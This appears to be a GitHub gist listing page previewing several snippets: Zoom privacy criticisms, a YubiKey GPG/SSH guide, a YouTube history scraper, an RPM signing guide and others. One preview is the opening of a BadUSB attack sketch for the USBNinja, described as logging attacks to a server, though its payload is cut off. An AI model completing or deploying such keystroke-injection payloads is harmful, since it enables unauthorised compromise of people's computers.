Skip to content

Instantly share code, notes, and snippets.

View jnaulty's full-sized avatar
👻
Listen. Learn. Grow

John Naulty Jr. jnaulty

👻
Listen. Learn. Grow
84 followers · 52 following
View GitHub Profile
@typokign
typokign / zoomsucks.md
Last active September 8, 2023 05:06
Zoom Sucks

Zoom Sucks

  • Zoom abuses the installer flow on MacOS to bypass permissions dialogs (source)
  • Zoom sends identifying device info to Facebook, even when users don't have a Facebook account (source) (fixed)
  • A bug in Zoom sent identifying information (including email addresses and profile pictures) of thousands of users to strangers (source)
  • Zoom claims that meetings are end-to-end encrypted in their white paper and marketing materials, but meetings are only encrypted in transit, and are available in plaintext to Zoom servers and employees. (source)
  • zoomAutenticationTool can be used to escalat
@lrvick
lrvick / usbninja.ino
Last active September 6, 2019 05:20
One size fits all BadUSB attack for Mac/Windows for the USBNinja. Logs all attacks to server. Server can optionally provide a unique payload for each target hostname/user combo.
#include <NinjaKeyboard.h>
void setup(){}
void loop() {}
void payloadA(){
USBninjaOnline();
NinjaKeyboard.begin();
NinjaKeyboard.delay(1000);
@ageis
ageis / YubiKey-GPG-SSH-guide.md
Last active May 20, 2024 09:52
Technical guide for using YubiKey series 4 for GPG and SSH

YubiKey 4 series GPG and SSH setup guide

Written for fairly adept technical users, preferably of Debian GNU/Linux, not for absolute beginners.

You'll probably be working with a single smartcard, so you'll want only one primary key (1. Sign & Certify) and two associated subkeys (2. Encrypt, 3. Authenticate). I've published a Bash function which automates this slightly special key generation process.

@chausies
chausies / youtube_history.py
Last active August 29, 2015 14:27
This python script gets all of your youtube viewing history into a convenient text file.
#---------------------------------------------------------------#
# This script manually goes through youtube and collects all #
# of your viewing history into a convenient text file. This #
# might take about 30min to an hour, depending on your #
# computer's RAM, processing speed, and internet connection. #
# Note that this program requires the splinter module to work. #
# Run 'pip install splinter' to get it. #
#---------------------------------------------------------------#
print "Making sure you're not using python 3..."
from splinter import Browser
@kristopolous
kristopolous / hn_seach.js
Last active July 24, 2023 04:12
hn job query search
// Usage:
// Copy and paste all of this into a debug console window of the "Who is Hiring?" comment thread
// then use as follows:
//
// query(term | [term, term, ...], term | [term, term, ...], ...)
//
// When arguments are in an array then that means an "or" and when they are seperate that means "and"
//
// Term is of the format:
// ((-)text/RegExp) ( '-' means negation )
@tcr
tcr / Vagrantfile
Last active November 29, 2015 02:39
tessel 2 openwrt in packer
VAGRANTFILE_API_VERSION = "2"
Vagrant.configure(VAGRANTFILE_API_VERSION) do |config|
config.ssh.username = "root"
config.ssh.password = "tessel2"
config.ssh.shell = "ash"
config.vm.synced_folder ".", "/vagrant", disabled: true
config.vm.box = "technicalmachine/tessel2"
@fernandoaleman
fernandoaleman / rpm-digital-signature.sh
Created November 18, 2011 15:18
How to sign your custom RPM package with GPG key
# How to sign your custom RPM package with GPG key
# Step: 1
# Generate gpg key pair (public key and private key)
#
# You will be prompted with a series of questions about encryption.
# Simply select the default values presented. You will also be asked
# to create a Real Name, Email Address and Comment (comment optional).
#
# If you get the following response: